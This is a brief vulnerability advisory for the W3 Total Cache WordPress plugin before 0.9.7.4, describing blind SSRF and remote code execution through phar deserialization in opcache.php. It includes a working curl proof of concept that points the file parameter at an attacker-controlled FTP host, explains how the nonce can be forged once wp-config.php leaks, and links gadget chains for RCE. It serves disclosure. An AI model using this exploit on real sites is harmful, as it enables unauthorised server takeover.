W3 Total Cache < 0.9.7.4 – Blind SSRF and RCE via phar

Description

The implementation of `opcache_flush_file` calls `file_exists` with a parameter fully controlled by the user.

Proof of Concept

curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flush_file&file=ftp://y.y.y.y:zzzz/' 

Notes:
- The nonce value is given by wp_hash('/wp-content/plugins/w3-total-cache/pub/opcache.php')
- You can generate the nonce without prior authentication if you are able to leak the contents of wp-config.php
- Valid popchains for this vulnerability can be found in https://github.com/ambionics/phpggc/tree/master/gadgetchains/WordPress/P/WooCommerce/RCE, it is *not* possible to use the Guzzle one, even if it is bundled with the plugin, as WordPress won't autoload it.